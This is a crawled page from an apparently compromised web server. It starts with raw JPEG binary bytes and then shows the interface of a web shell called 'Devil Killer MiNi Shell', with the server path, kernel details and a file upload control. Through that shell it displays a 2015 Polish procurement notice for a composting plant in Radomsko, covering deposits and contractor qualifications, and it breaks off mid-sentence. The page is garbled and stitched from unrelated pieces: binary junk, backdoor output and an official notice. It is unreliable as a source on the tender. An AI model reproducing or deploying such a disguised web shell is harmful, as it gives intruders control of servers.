JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150302/45324-N-2015.html

<p class="kh_header"><b>Radomsko: Budowa kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu Unieszkodliwiania 
    Odpadów Komunalnych w Płoszowie wraz z dostawą urządzeń na wyposażenie 
    instalacji</b><br>
<b>Numer ogłoszenia: 45324 - 2015; data zamieszczenia: 02.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka  z o.o. , ul. Stara Droga 85, 97-500 Radomsko, woj. łódzkie, tel. 044 6830630 w. 45, faks 044 6834377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk-radomsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. 100 % udziałów jest własnością gminy miasta Radomsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu Unieszkodliwiania 
    Odpadów Komunalnych w Płoszowie wraz z dostawą urządzeń na wyposażenie 
    instalacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu Unieszkodliwiania 
    Odpadów Komunalnych w Płoszowie wraz z dostawą urządzeń na wyposażenie 
    instalacji.
Realizacja przedmiotu zamówienia będzie przebiegała z podziałem na zadania:
    Zadanie 1
    Budowa kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu Unieszkodliwiania 
    Odpadów Komunalnych w Płoszowie.
1. Przedmiot zamówienia należy wykonać zgodnie z wytycznymi zawartymi w dokumentacji 
    i specyfikacji technicznej wykonania i odbioru robót, obowiązującymi przepisami i 
    normami, zasadami sztuki budowlanej, wiedzy technicznej oraz warunkami technicznymi 
    wykonania i odbioru robót. 
2. Zakres przedmiotu zamówienia obejmuje w szczególności wykonanie:
 -  instalacji do stabilizacji frakcji o wielkości co najmniej 0-80 mm ulegającej biodegradacji
    wydzielonej ze zmieszanych odpadów komunalnych - roboty budowlane oraz dostawa i 
    montaż technologii ( system napowietrzania i wentylacji, system ujęcia i oczyszczenia 
    powietrza procesowego, system odprowadzania powstających odcieków, system sterowania 
    i czujników technologicznych wraz z oprogramowaniem, dach i drzwi, kontener 
    techniczny ),
 -  wiaty magazynowej,
 -  placu dojrzewania,
 -  placu pod biofiltr,
 -  placu technologicznego przeznaczonego do magazynowania i przetwarzania odpadów 
    wielkogabarytowych oraz odpadów budowlanych i rozbiórkowych,
 -  placu pod zbiornik na paliwo,
 -  dróg i placów wewnętrznych,
 -  muru oporowego placu magazynowania wsadu,
 -  zewnętrznej instalacji kanalizacyjnej odprowadzającej ścieki deszczowe oraz odcieki 
     technologiczne,
 -  zewnętrznej instalacji wodociągowej,
 -  zewnętrznej instalacji elektroenergetycznej ( zasilającej i oświetleniowej ) i teletechnicznej,
 -  zieleni ozdobnej,
 -  ogrodzenia,
 -  stacji nadawczej dla frakcji 0-80 mm ( dostawa i montaż ),
 -  zbiornika na odcieki o pojemności 600 m3,
 -  rozruchu technologicznego w celu sprawdzenia sprawności wszystkich urządzeń
    i zastosowanej technologii i przeprowadzenia szkolenia załogi Zamawiającego w zakresie 
eksploatacji instalacji.

UWAGA!

Wykonawca zobowiązany jest do uzyskania pozwolenia na użytkowanie kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z infrastrukturą towarzyszącą zlokalizowaną na terenie ZUOK w Płoszowie w pełnym zakresie obejmującym przedmiot zamówienia.

3. Szczegółowy opis przedmiotu zamówienia zawierają:

1) Projekt budowlany dla inwestycji pn. Kompostownia odpadów biodegradowalnych w 
    systemie zamkniętym wraz z infrastrukturą towarzyszącą zlokalizowana na terenie ZUOK 
    w Płoszowie - załącznik nr 20 do siwz.
2) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych dla inwestycji pn.: Budowa kompostowni odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu Unieszkodliwiania 
    Odpadów Komunalnych w Płoszowie - załącznik nr 21 do siwz.
3) Przedmiar robót stanowiący załącznik nr 22 do siwz.
4) Wykaz wymagań dla instalacji i urządzeń równoważnych dla zadania 1- załącznik nr 23;
5) Dokumentacja badań podłoża gruntowego wraz z opinią geotechniczną dla inwestycji 
    pn. Kompostownia odpadów biodegradowalnych w systemie zamkniętym wraz z 
    infrastrukturą towarzyszącą zlokalizowana na terenie ZUOK w Płoszowie - załącznik 
    nr 24;
6) Projekt budowlany dla inwestycji pn. Rozbudowa Zakładu Unieszkodliwiania Odpadów 
    Komunalnych dla miasta Radomska i gmin ościennych w Jadwinówce. Dotyczy 
    realizacji zbiornika na odcieki. Tom I - część opisowa. Tom II - część rysunkowa - 
    załącznik nr 25;
7) Specyfikacja techniczna wykonania i odbioru robót budowlanych dla inwestycji pn.
     Rozbudowa Zakładu Unieszkodliwiania Odpadów Komunalnych dla miasta Radomska 
     i gmin ościennych w Jadwinówce gm. Radomsko - etap II. Dotyczy realizacji zbiornika 
    na odcieki -  załącznik nr 26;
8) Dodatkowy opis przedmiotu dla zadania 1 obejmującego budowę kompostowni odpadów 
    w systemie zamkniętym wraz z infrastrukturą towarzyszącą zlokalizowaną na terenie 
    Zakładu Unieszkodliwiania Odpadów Komunalnych w Płoszowie na części działki o 
    numerze ewidencyjnym 398/1, obręb 0009 Płoszów, gmina Radomsko, powiat 
    radomszczański, województwo łódzkie stanowiący uzupełnienie projektu budowlanego o 
    opis technologii procesu biologicznego przetwarzania odpadów, który stanowi integralną 
    część dokumentacji wnioskowanego zamówienia. Dodatkowo zawiera elementy, które nie 
    są ujęte w projekcie budowlanym a są konieczne do zrealizowania zadania  - załącznik 
    nr 27.
Zadanie 2
Dostawa mobilnego przesiewacza bębnowego w ilości 1 szt.

Dostarczony mobilny przesiewacz bębnowy winien być fabrycznie nowy, nieużywany - rok 
produkcji 2015 o wydajności min. 100m3/h. Powinien służyć do przesiewania: 
- materiału uzyskanego po procesach stabilizacji frakcji o wielkości co najmniej 0-80 mm 
  ulegającej biodegradacji wydzielonej ze zmieszanych odpadów komunalnych oraz po 
  procesach kompostowania odpadów ulegających biodegradacji zbieranych selektywnie,
- odpadów komunalnych zmieszanych,
- kory drzewnej, materiału strukturalnego,
- piasku i żwiru.
Sito musi być urządzeniem mobilnym, na podwoziu przynajmniej tandemowym 
wyposażonym w ABS przystosowane do poruszania się po drogach publicznych z prędkością do 80 km/h.
Szczegółowy opis zadania został określony w rozdziale 3 SIWZ.
Zadanie 3
    Dostawa przyczepy ciężarowej rolniczej - pojemnika - wozu asenizacyjnego do 
    wypompowywania i przewozu ścieków w ilości 1 szt.
    Dostarczony wóz asenizacyjny winien być fabrycznie nowy, nieużywany i nierejestrowany - rok produkcji 2015: 1) Wóz asenizacyjny powinien służyć do wypompowywania ścieków ze zbiornika na odcieki 
      ( w zbiorniku znajdować się będą wody odciekowe ze składowiska odpadów, odcieki z 
      obiektu kompostowni oraz ścieki z placów i dróg ) oraz do przewozu ścieków 
      komunalnych.
  2) Urządzenie powinno być dopuszczone do ruchu po drogach publicznych z prędkością  co 
      najmniej 30 km/h.
Szczegółowy opis zadania został określony w rozdziale 3 SIWZ.
Zadanie 4
    Dostawa samochodu ciężarowego z zabudową hakową w ilości 1 szt.
    Dostarczony samochód ciężarowy winien być fabrycznie nowy, nieużywany i 
    nierejestrowany - rok produkcji 2015.
Szczegółowy opis zadania został określony w rozdziale 3 SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.25.38.00-3, 45.21.32.80-9, 42.90.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium

 1. Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść 
     wadium dla:
   - zadania 1 w wysokości 250.000,00 PLN (słownie: dwieście pięćdziesiąt tysięcy złotych).
   - zadania 2 w wysokości   15.000,00 PLN (słownie: piętnaście tysięcy złotych).
   - zadania 3 w wysokości     1.000,00 PLN (słownie: jeden tysiąc złotych).
   - zadania 4 w wysokości   10.000,00 PLN (słownie: dziesięć tysięcy złotych).

 2. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 

 Forma wadium

    Wadium może być wnoszone w jednej lub kilku następujących formach:
    1) pieniądzu; 
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
        kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
        z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości       
       ( Dz. U. z 2007 r. Nr 42, poz. 275 ). 

 Miejsce i sposób wniesienia wadium

 1. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy 
      Zamawiającego:

        Bank PEKAO S.A., konto nr 36124031321111000029671261 z dopiskiem: 
     Wadium na Budowę kompostowni odpadów biodegradowalnych w systemie 
        zamkniętym wraz z infrastrukturą towarzyszącą, zlokalizowaną na terenie Zakładu 
        Unieszkodliwiania Odpadów Komunalnych w Płoszowie wraz z  dostawą urządzeń 
        na wyposażenie instalacji.

  2. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu 
      składania ofert znajdzie się na rachunku bankowym Zamawiającego.
  3. Jeżeli wadium zostanie wniesione w formie, o której mowa w pkt 2)-5), wówczas 
      Wykonawca składa oryginał dokumentu potwierdzającego wniesienie wadium 
      razem z ofertą.
      Dokument gwarancji lub poręczenia stanowiący formę wadium musi zawierać 
      w swojej treści stwierdzenie, że gwarant zobowiązuje się bezwarunkowo i nieodwołalnie 
      pokryć wszelkie zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów 
      zawartych w art. 46 ust 4a i ust 5 ustawy Prawo zamówień publicznych do wysokości 
      gwarantowanej kwoty, na pierwsze pisemne żądanie Zamawiającego wzywające do 
      zapłaty w okresie obowiązywania gwarancji. W dokumencie tym gwarant/poręczyciel nie 
      może uzależniać dokonania zapłaty od spełnienia przez beneficjenta dodatkowych 
       warunków lub czynności. Dopuszczalnym przez Zamawiającego żądaniem gwaranta 
       może być np. żądanie oświadczenia beneficjenta o przyczynach zatrzymania wadium 
       oraz dokumentu potwierdzającego, że osoby, które podpisały wezwanie do zapłaty w 
       imieniu beneficjenta, upoważnione są do jego reprezentowania. 
  4.  Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, Wykonawca dołączy do 
       oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu 
       przelewu należy wpisać: Wadium na: Budowę kompostowni odpadów        
       biodegradowalnych w systemie zamkniętym wraz z infrastrukturą towarzyszącą, 
       zlokalizowaną na terenie Zakładu Unieszkodliwiania Odpadów Komunalnych 
       w Płoszowie wraz z dostawą urządzeń na wyposażenie instalacji.
  5.  Gwarancja/poręczenie musi być wykonalne na terytorium Rzeczypospolitej Polskiej.
  6.  Nie wniesienie wadium w terminie lub w sposób określony w siwz spowoduje 
       wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
  7.  Wszelkie spory dotyczące gwarancji/poręczenia podlegają rozstrzygnięciu zgodnie z 
       prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby 
       Zamawiającego.

 Zwrot wadium

  1.  Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze 
       najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, 
       którego oferta zostanie wybrana jako najkorzystniejsza.    
  2. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający 
       zwróci wadium niezwłocznie po zawarciu umowy. 
  3.  Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał 
       ofertę przed upływem terminu składania ofert. 

  Utrata wadium

  1.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
   -  Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 , z przyczyn 
       leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa 
       w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy 
       kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 lub informacji o tym, że nie należy do 
       grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa 
       w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez 
       Wykonawcę jako najkorzystniejszej;   
    - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
       określonych w ofercie;
     -  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
     -  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
        leżących po stronie Wykonawcy.
   2.  W zakresie wadium obowiązują uregulowania ustawy Prawo zamówień publicznych 
        zawarte w art. 45 i 46 Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie 
        Wykonawca jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1

   1. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o 
       zamówienie wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
       jednego zadania polegającego na budowie instalacji do stabilizacji frakcji o wielkości co 
       najmniej 0-80 mm ulegającej biodegradacji wydzielonej ze zmieszanych odpadów 
       komunalnych w technologii opartej na zamkniętych niezależnych  tunelach żelbetowych 
       z niezależnym sterowaniem procesu kompostowania ze stropem żelbetowym lub 
       stropem z tworzywa sztucznego wraz z biofiltrem o wydajności minimum 19 000  
       Mg/rok i wartości nie mniejszej niż 5,0 mln zł wyposażonej w układ napowietrzania i 
       oczyszczania powietrza w biofiltrze lub technologii równoważnej, z podaniem rodzaju, 
       wartości, daty i miejsca wykonania oraz załączeniem dowodów określających, czy roboty 
       te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane 
       zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
       Warunek ten dotyczy zadania 1.
   2. Wykonawca przedstawi roczne wyniki badań ( tj. 12 wyników po jednym w każdym 
       miesiącu ) z m.in. jednej funkcjonującej instalacji do stabilizacji frakcji o wielkości co 
       najmniej 0-80 mm ulegającej biodegradacji wydzielonej ze zmieszanych odpadów 
       komunalnych, w której Wykonawca brał udział i które wykonane były zgodnie z 
       wypełnieniem zapisów Rozporządzenia Ministra Środowiska z dnia 11 września 2012 r. 
       w sprawie mechaniczno-biologicznego przetwarzania zmieszanych odpadów 
       komunalnych ( Dz.U. z 2012 r., poz.1052 ). 
       Warunek ten dotyczy zadania 1.


       Zadanie 2

       Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o 
       zamówienie wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania 
       ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w 
       tym okresie wykonał co najmniej 2 dostawy odpowiadające swoim rodzajem dostawie 
       głównej stanowiącej przedmiot zamówienia ( dostawy muszą dotyczyć oferowanego w 
       niniejszy postępowaniu urządzenia ) tj. mobilnego przesiewacza bębnowego z podaniem 
       wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały 
       wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie - wg wzoru 
       stanowiącego załącznik nr 5 do siwz.
       Warunek ten dotyczy zadania 2.

       Zadanie 3

       Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o 
       zamówienie wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania 
       ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w 
       tym okresie wykonał co najmniej 2 dostawy odpowiadające swoim rodzajem dostawie 
       głównej stanowiącej przedmiot zamówienia ( dostawy muszą dotyczyć oferowanego w 
       niniejszy postępowaniu urządzenia ) tj. dostawie wozu asenizacyjnego do 
       wypompowywania i przewozu ścieków z podaniem wartości, przedmiotu, dat wykonania 
       i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, 
       czy zostały wykonane należycie - wg wzoru stanowiącego załącznik nr 6 do siwz.
       Warunek ten dotyczy zadania 3.

       Zadanie 4

       Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o 
       zamówienie wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania 
       ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w 
       tym okresie wykonał co najmniej 2 dostawy odpowiadające swoim rodzajem dostawie 
       głównej stanowiącej przedmiot zamówienia ( dostawy muszą dotyczyć oferowanego w 
       niniejszy postępowaniu urządzenia ) tj. dostawie samochodu ciężarowego typu hakowiec 
       do transportu kontenerów z podaniem wartości, przedmiotu, dat wykonania 
       i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, 
       czy zostały wykonane należycie - wg wzoru stanowiącego załącznik nr 7 do siwz.
       Warunek ten dotyczy zadania 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym Zamawiający 
        nie precyzuje w tym zakresie żadnych wymagań dla zadania 1, 2, 3 i 4, których 
        spełnianie Wykonawca jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potwierdzenia spełniania warunku dla zadania 1 dotyczącego dysponowania 
        osobami posiadającymi wymagane kwalifikacje zawodowe i wykształcenie zostanie 
        uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
   -  jedną osobą, która pełnić będzie funkcję kierownika projektu posiadającą co najmniej: 
       wykształcenie wyższe techniczne, 10 letnie doświadczenie w pracy na stanowisku 
       kierownika budowy w tym:  5 letnie doświadczenie zawodowe w pracy w zakresie 
       Ochrony Środowiska   
       Informacja ta winna zawierać:
   a) przedmiot zamówienia ( wykaz prowadzonych robót ),
   b) podmiot, dla którego realizowane było zamówienie,
   c) daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy.
    -  jedną osobą, która pełnić będzie funkcję kierownika robót branży sanitarnej 
    posiadającą określone przepisami ustawy Prawo budowlane ( tj. Dz. U. z 2013 r. poz. 
   1409 z poźn. zm. ) uprawnienia do kierowania robotami budowlanymi w specjalności 
    instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych oraz wodociągowych 
    i kanalizacyjnych bez ograniczeń, w zakresie wymaganym do realizacji zadania lub  
    odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej   
    obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w 
    zakresie wymaganym do realizacji niniejszego zamówienia. 
        Doświadczenie zawodowe - minimum 5 letnie doświadczenie w pracy na stanowisku  
        kierownika budowy/robót i/lub inspektora nadzoru w branży sanitarnej.
        Informacja ta winna zawierać:
    a) przedmiot zamówienia ( wykaz prowadzonych robót ),
    b) podmiot, dla którego realizowane było zamówienie,
    c) daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy/robót 
        i/lub inspektora nadzoru.
     -  jedną osobą, która pełnić będzie funkcję kierownika robót branży elektrycznej  
         posiadającą określone przepisami ustawy Prawo budowlane ( tj. Dz. U. z 2013 r. poz. 
        1409 z późn. zm.) uprawnienia do kierowania robotami budowlanymi w specjalności 
         instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez 
         ograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie 
         wcześniej obowiązujących przepisów upoważniające do kierowania robotami 
         budowlanymi w zakresie wymaganym do realizacji niniejszego zamówienia.
         Doświadczenie zawodowe - minimum 5 letnie doświadczenie w pracy na stanowisku  
         kierownika budowy/robót i/lub inspektora nadzoru w robotach elektrycznych.
         Informacja ta winna zawierać:
    a)  przedmiot zamówienia ( wykaz prowadzonych robót ),
    b)  podmiot, dla którego realizowane było zamówienie,
    c)  daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy/robót 
         i/lub inspektora nadzoru.
     -  jedną osobą, która pełnić będzie funkcję kierownika robót w specjalności 
         konstrukcyjno-budowlanej posiadającą określone przepisami ustawy Prawo 
         budowlane ( tj. Dz. U. z 2013 r. poz. 1409 z późn. zm. ) uprawnienia do kierowania 
         robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub 
         odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej 
         obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w 
         zakresie wymaganym do realizacji niniejszego zamówienia. 
         Doświadczenie zawodowe - minimum 5 letnie doświadczenie w pracy na stanowisku  
         kierownika budowy/robót i/lub inspektora nadzoru w tym: doświadczenie na stanowisku 
         kierownika robót lub kierownika budowy przy minimum 1 zadaniu polegającym na 
         zrealizowaniu inwestycji związanej z budową kompostowni w systemie zamkniętym, 
         wyposażonej w układ napowietrzania i oczyszczania powietrza w biofiltrze lub 
         urządzeniu równoważnym.     
     Informacja ta winna zawierać:
 a) przedmiot zamówienia ( wykaz prowadzonych robót ),
 b) podmiot, dla którego realizowane było zamówienie,
 c) daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy/robót 
     i/lub inspektora nadzoru.
 - jedną osobą, która będzie pełnić funkcję Specjalisty ds. montażu i rozruchu - posiadającą co 
    najmniej: wykształcenie wyższe techniczne, 2 letnie doświadczenie zawodowe 
